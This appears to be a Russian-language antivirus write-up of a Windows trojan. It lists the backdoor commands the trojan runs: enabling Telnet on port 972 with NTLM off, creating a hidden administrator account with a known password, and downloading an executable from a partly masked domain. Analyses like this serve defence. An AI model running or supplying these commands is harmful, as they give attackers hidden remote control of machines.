Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (служба Telnet переводится в режим автоматического запуска)
- <SYSTEM32>\calssc.exe (загружен из сети Интернет)
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-NTLM (Telnet-сервер переносится на нестандартный порт 972, NTLM-аутентификация отключается)
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\ftp.exe -s:TAR_BZ.TXT
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
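- <SYSTEM32>\reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v hacker /t REG_DWORD /d 00000000 (значение 0 в этом разделе скрывает учётную запись с экрана приветствия Windows; скрывается имя hacker, тогда как в приведённом списке создаётся учётная запись tony)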
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen "%TEMP%\33.jpg"
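- <SYSTEM32>\net1.exe localgroup Администраторы tony /add (учётная запись tony добавляется в локальную группу администраторов)
- <SYSTEM32>\net1.exe user tony stark /add (создаётся локальная учётная запись tony с паролем stark)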
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\binds[1].exe
- <SYSTEM32>\calssc.exe
- %TEMP%\2820S21U.bat
- %TEMP%\sh.exe
- %TEMP%\33.jpg
- %TEMP%\2820S21U.bat
- %TEMP%\2820S21U.bat
- 'fl###nia.com':80
- fl###nia.com/binds.exe
- DNS ASK fl###nia.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''